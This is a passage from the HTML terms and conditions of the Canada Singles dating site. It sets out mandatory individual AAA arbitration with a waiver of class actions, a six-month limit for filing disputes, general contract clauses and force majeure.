actual or threatened breach of this confidentiality provision by temporary, preliminary or permanent injunctive, or declaratory relief in an appropriate court of law. This provision shall not prevent either party from filing a petition in court to confirm an arbitration award.</p> <p style="text-align: left;">25.4         The parties expressly agree that any Dispute is personal to them, and any Dispute shall only be resolved by an individual arbitration. Neither party agrees to class arbitration, or an arbitration where a person brings a Dispute as a representative of any other person or persons. Neither party agrees that a Dispute can be brought as a class or representative action outside of arbitration, or on behalf of any other person or persons. The parties agree that that a Dispute may only be resolved through an individual arbitration and shall not be brought as a class arbitration, a class action, or any other representative proceeding. If your agreement to waive any right to a jury trial or to participate in a class action is found to be unenforceable, then the entirety of this arbitration section will be null and void and neither you nor we will be entitled to arbitrate our dispute.</p> <p style="text-align: left;">25.5         The arbitration of the Dispute will be administered by the American Arbitration Association (“<strong>AAA</strong>”) or, in the event the AAA declines or is unable to administer the arbitration, by an arbitration forum or arbitrator that you and we mutually agree upon. If, after making a reasonable effort, you and we are unable to agree upon an arbitration forum or arbitrator, the AAA or a court having proper jurisdiction will appoint an arbitration forum or arbitrator. The arbitration will be conducted in accordance with the AAA’s Commercial Arbitration Rules (“<strong>Commercial Rules</strong>”) and, when deemed appropriate by the arbitration forum or arbitrator, the AAA’s Supplementary Procedures for Consumer-Related Disputes (“<strong>Consumer Procedures</strong>”), or the appropriate rules of any alternative arbitration forum selected by you and us or appointed by a court, subject to the following modifications:</p> <p style="text-align: left;">25.5.1         The arbitration will be conducted before a single arbitrator who will be a licensed attorney or a former judge and will have at least five (5) years of legal experience in the resolution of commercial disputes.</p> <p style="text-align: left;">25.5.2         As limited by the FAA, the terms of this Agreement, and the applicable AAA rules, the arbitrator will have the exclusive power and jurisdiction to make all procedural and substantive decisions concerning the Dispute. This does not include the power to conduct a class arbitration or a representative action, which is prohibited by the terms of this Agreement as stated above. The arbitrator may only conduct an individual arbitration, and may not consolidate more than one person’s claims and may not preside over any form of representative or class proceeding, or any proceeding on behalf of or involving more than one person or persons.</p> <p style="text-align: left;">25.5.3        The parties may take discovery through interrogatories, depositions and requests for production that the arbitrator determines to be necessary and appropriate.</p> <p style="text-align: left;">25.5.4         The prevailing party in any of the following matters (without regard to the Limitation of Liability provisions) shall be entitled to recover its reasonable attorneys’ fees and costs incurred in any of the following circumstances:</p> <p style="text-align: left;">(a)              a motion which any party is required to make in any court to compel arbitration of a Dispute;</p> <p style="text-align: left;">(b)             any appeal of an arbitration award, whether to the arbitrator or the courts, for the purpose of vacating or modifying the award; or</p> <p style="text-align: left;">(c)              any action to enforce the confidentiality provisions stated herein we will pay the amount of any arbitration costs and fees charged by the AAA for claims totaling less than $10,000 unless the arbitrator determines the claims are frivolous. In no event will we pay for your attorneys’ fees unless required by law.</p> <p style="text-align: left;">25.5.5         To begin an arbitration proceeding, you must send a letter requesting arbitration and describing your claim to:</p> <p style="text-align: left;">Canada Singles Customer Care –<br /> <strong>Global Fusion Media</strong><br /> subsidiary Company<br /> <strong>Ads Go</strong><br /> CP 21523 BP Ste-Famille, Sherbrooke QC J1G 5K2<br /> Canada<br /> Email: <a href="mailto:dataprotection@canada-singles.ca">dataprotection@canada-singles.ca</a></p> <p style="text-align: left;">25.5.6         You may choose to have the arbitration conducted by telephone, based on written submissions, or in person in the county where you live or at another mutually agreed location. The AAA Commercial Rules and Consumer Procedures, the forms you may need to begin the arbitration proceeding, and other information about the AAA, are available from the AAA, which can be contacted by mail at 1633 Broadway, Floor 10, New York, New York 10019, by telephone at (800) 778-7879, or through its website at www.adr.org.</p> <p style="text-align: left;">25.6         This Agreement does not require you or us to submit to arbitration any Dispute involving our intellectual property rights in and to the websites or the Service, including, without limitation:</p> <p style="text-align: left;">25.6.1         claims of infringement or misappropriation of any United States or foreign copyright, patent, trade secret, trademark, service mark or trade dress;</p> <p style="text-align: left;">25.6.2         claims alleging violations of Title 17 of the United States Code, Sections 1201 and/or 1202, or of any similar foreign law; or</p> <p style="text-align: left;">25.6.3         in any matter that involves any of the foregoing claims, for resolution or decision of any question of fact or law required to resolve such claim, including, but not limited to, questions required to decide or rule with respect to the infringement, misappropriation, validity, enforceability or ownership of any copyright, patent, trade secret, trademark, service mark or trade dress or with respect to any remedy or relief at law or in equity for any such infringement or misappropriation or for any violation of such Sections 1201 and/or 1202.</p> <p style="text-align: left;">25.7         You and we acknowledge and agree that any violation of this Section 25 of this Agreement may cause the parties irreparable harm, and therefore you and we agree that the parties will be entitled to seek extraordinary relief in court, including but not limited to temporary restraining orders, preliminary injunctions and permanent injunctions without the necessity of posting a bond or other security, in addition to and without prejudice to any other rights or remedies that the parties may have for a breach of this Section 25 of this Agreement.</p> <p style="text-align: left;">25.8         With the exception of your agreement to waive any right to a jury trial or to participate in a class action, if any other provision in this Section 25 is held to be illegal, invalid or unenforceable, such provision shall be fully severable, this Section 25 shall be construed and enforced as if such illegal, invalid or unenforceable provision had never comprised a part of this section, and the remaining provisions of this section shall remain in full force and effect. Furthermore, in lieu of such illegal, invalid or unenforceable provision, there shall be added automatically as part of this Section 25 legal, valid and enforceable provision as similar as possible to the former provision.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »26. LIMITATION OF TIME PERIOD TO COMMENCE ANY DISPUTE » tab_id= »1596408528790-6b6db4ee-53e8″][vc_column_text]</p> <p style="text-align: left;">26.1         Regardless of any statute of limitations or law to the contrary, and to maximum extent permitted by applicable law, any Dispute arising out of or related to the Services or this Agreement must be filed within six (6) months after the date in which the incident giving rise to the Dispute occurred; provided that, if the substantive law applicable to the arbitration prohibits the parties from agreeing to this limitations period, then the limitations period under the applicable substantive law shall control. The failure of a party to file an arbitration claim within the applicable limitations period shall constitute a waiver by that party of its right to bring such a claim relating to any Dispute in any form, and a complete bar to any claim based on any Dispute, and the arbitrator shall not have jurisdiction to make a determination for a party that has not brought its Dispute for determination within the applicable limitations period.</p> <p>[/vc_column_text][/vc_tta_section][vc_tta_section title= »27. GENERAL » tab_id= »1596408549518-37b30e57-23c4″][vc_column_text]</p> <p style="text-align: left;">27.1         These Terms & Conditions and the Privacy Policy contain the entire Agreement between you and the Company. If any provision of this Agreement is held by any competent court or authority to be invalid or unenforceable in whole or in part, the validity of the other provisions of this Agreement and the remainder of the affected provision shall be unaffected and shall remain in full force and effect.</p> <p style="text-align: left;">27.2         The Agreement is not intended to create a partnership, joint venture or relationship of principal and agent between the parties.</p> <p style="text-align: left;">27.3         No waiver by the Company of any breach of this Agreement shall be considered as a waiver of any subsequent breach of the same provision or any other provision.</p> <p style="text-align: left;">27.4         The Company may assign its rights under these Terms & Conditions to any person or entity without your consent. The rights granted to you under these Terms & Conditions may not be assigned without the Company’s prior written consent, and any attempted unauthorized assignment by you shall be null and void.</p> <p style="text-align: left;">27.5         Clauses 20 to 27 inclusive will survive termination or expiration of this Agreement.</p> <p style="text-align: left;">27.6         <strong>Force Majeure</strong></p> <p style="text-align: left;">27.6.1         For the purposes of this clause 27.6, “<strong>Force Majeure Event</strong>” means any act or event beyond the reasonable control of the Company, including without limitation strikes, lock-outs or other industrial action by third parties, civil commotion, riot, invasion, terrorist attack or threat of terrorist attack, war (whether declared or not) or threat or preparation for war, fire, explosion, storm, flood, earthquake, subsidence, epidemic or other natural disaster, or failure of public or private telecommunications networks.</p> <p style="text-align: left;">27.6.2         The Company will not be liable for any failure to perform or any delay in performance of, any of its obligations under these Terms & Conditions caused by a Force Majeure Event.</p> <p style="text-align: left;">27.6.3         In the event of a Force Majeure Event that results in Services being unable to be provided for 14 days or more, either party may terminate this Agreement with immediate effect upon written notice to the other and neither party will have the right to claim compensation from the other.</p> <p>[/vc_column_text][/vc_tta_section][/vc_tta_accordion][/vc_column][/vc_row][:]</p> </div><!-- .entry-content --> </div> </div> </article><div class="row"> <div class="col-md-12"> <div class="comment-wrap-outer"> <div class="comment-wrap-main clearfix"> </div> </div> </div> </div> <footer id="colophon" class="site-footer" role="contentinfo"> <aside id="lm-footer-top-area" class="widget-area clearfix" role="complementary"> <div class="footer-wrap"> <div class="container"> <div class="row"> <div class="col-md-3 col-sm-3 col-xs-6 aos-init aos-animate" data-aos-once="true" data-aos="fade-up" data-aos-duration="800" data-aos-delay="50"> </div> <div class="col-md-3 col-sm-3 col-xs-6 aos-init aos-animate" data-aos-once="true" data-aos="fade-up" data-aos-duration="800" data-aos-delay="100"> </div> <div class="col-md-3 col-sm-3 col-xs-6 aos-init aos-animate" data-aos-once="true" data-aos="fade-up" data-aos-duration="800" data-aos-delay="150"> </div> <div class="col-md-3 col-sm-3 col-xs-6 aos-init aos-animate" data-aos-once="true" data-aos="fade-up" data-aos-duration="800" data-aos-delay="200"> </div> </div> </div> </div> </aside><!-- #lm-footer-top-area --> <aside id="lm-footer-copyright" class="widget-area clearfix" role="complementary"> <div class="container-fluid"> <div class="row"> <div class="col-md-12"> </div> </div> </div> </aside><!-- #lm-footer --> </footer><!-- #colophon --> </section> </div> </div><!-- #page --> <style id='core-block-supports-inline-css' type='text/css'> /** * Core styles: block-supports */ </style> </body> </html>